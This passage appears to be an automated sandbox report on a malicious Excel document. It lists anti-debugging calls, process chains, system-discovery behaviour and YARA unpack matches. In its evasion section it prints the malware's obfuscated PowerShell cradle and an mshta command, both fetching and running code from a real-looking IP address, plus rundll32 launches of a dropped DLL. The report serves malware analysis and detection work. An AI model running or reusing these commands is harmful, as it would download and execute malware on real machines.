Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A7E00 FindFirstFileW, 17_2_002A7E00
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00384087 mov eax, dword ptr fs:[00000030h] 9_2_00384087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384087 mov eax, dword ptr fs:[00000030h] 10_2_00384087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00284087 mov eax, dword ptr fs:[00000030h] 11_2_00284087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194087 mov eax, dword ptr fs:[00000030h] 12_2_00194087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00264087 mov eax, dword ptr fs:[00000030h] 14_2_00264087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00234087 mov eax, dword ptr fs:[00000030h] 15_2_00234087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_003B4087 mov eax, dword ptr fs:[00000030h] 16_2_003B4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002B4087 mov eax, dword ptr fs:[00000030h] 17_2_002B4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
Source: Yara match File source: 2022-28-01_1202.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPED

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 15.2.rundll32.exe.a50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2290000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2270000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.990000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2df0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b10000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f90000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a20000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ae0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c60000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.cc0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED